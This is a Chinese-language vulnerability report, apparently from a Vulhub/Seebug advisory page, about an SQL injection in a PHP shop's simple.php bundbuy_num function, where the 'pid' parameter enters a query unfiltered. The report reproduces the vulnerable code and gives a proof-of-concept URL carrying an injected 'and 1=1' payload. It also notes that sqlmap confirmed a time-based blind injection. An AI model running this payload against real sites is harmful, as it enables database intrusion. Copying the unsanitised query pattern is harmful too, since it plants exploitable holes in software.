VULHUB ™

### 简要描述： 未过滤，导致注入 ### 详细说明： 问题出现在/protected/controllers/simple.php中： ``` //捆绑商品数量 public function bundbuy_num(){ $id = Filter::int(Req::args('id')); $num = Filter::int(Req::args('num')); if($num<=0)$num = 1; $product_id = Req::args('pid');//pid参数未过滤直接传给$product_id $product_ids = preg_replace('/-/i', ',', $product_id);//$product_id将字符串中-替换为,后传给$product_ids $model = new Model("bundling"); $bund = $model->where("id=$id")->find(); if($bund){//为了条件语句执行，$id要存在。 $goods_id = $bund['goods_id']; $products = $model->table("goods as go")->join("left join products as pr on pr.goods_id=go.id")->where("pr.id in ($product_ids)")->fields("*,pr.id as product_id")->group("go.id")->findAll();//$product_ids直接放入查询语句中 $products = $this->packBundbuyProducts($products); } $weight = 0; $max_num = $num; foreach ($products as $prod) { $weight += $prod['weight']; if($max_num>$prod['store_nums'])$max_num = $prod['store_nums']; } $num = $max_num; $amount = sprintf("%01.2f",$bund['price'] * $num);...

### 简要描述： 未过滤，导致注入 ### 详细说明： 问题出现在/protected/controllers/simple.php中： ``` //捆绑商品数量 public function bundbuy_num(){ $id = Filter::int(Req::args('id')); $num = Filter::int(Req::args('num')); if($num<=0)$num = 1; $product_id = Req::args('pid');//pid参数未过滤直接传给$product_id $product_ids = preg_replace('/-/i', ',', $product_id);//$product_id将字符串中-替换为,后传给$product_ids $model = new Model("bundling"); $bund = $model->where("id=$id")->find(); if($bund){//为了条件语句执行，$id要存在。 $goods_id = $bund['goods_id']; $products = $model->table("goods as go")->join("left join products as pr on pr.goods_id=go.id")->where("pr.id in ($product_ids)")->fields("*,pr.id as product_id")->group("go.id")->findAll();//$product_ids直接放入查询语句中 $products = $this->packBundbuyProducts($products); } $weight = 0; $max_num = $num; foreach ($products as $prod) { $weight += $prod['weight']; if($max_num>$prod['store_nums'])$max_num = $prod['store_nums']; } $num = $max_num; $amount = sprintf("%01.2f",$bund['price'] * $num); $product[$product_id] = array('id'=>$product_ids,'goods_id'=>'','name'=>'','img'=>'','num'=>$num,'store_nums'=>$num,'price'=>$bund['price'],'spec'=>array(),'amount'=>$amount,'sell_total'=>$amount,'weight'=>$weight,'point'=>'',"prom_goods"=>array(),"sell_price"=>$bund['price'],"real_price"=>$bund['price']); echo JSON::encode($product); } ``` ### 漏洞证明： http://localhost/index.php?con=simple&act=bundbuy_num&id=1&num=1&pid=1,2,3,4) and 1=1 %23 [<img src="https://images.seebug.org/upload/201408/24203220d1aa5f4dc5d378d809e733993e175480.png" alt="QQ截图20140824203047.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/24203220d1aa5f4dc5d378d809e733993e175480.png) [<img src="https://images.seebug.org/upload/201408/24203227fa34c9542343c7e7a7ec587dd055a992.png" alt="QQ截图20140824203116.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/24203227fa34c9542343c7e7a7ec587dd055a992.png) 用sqlmap跑一下，pid是注入参数，又是基于时间盲注 [<img src="https://images.seebug.org/upload/201408/242049398fbd563514627c20483226c62bf4737f.png" alt="QQ截图20140824204828.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/242049398fbd563514627c20483226c62bf4737f.png)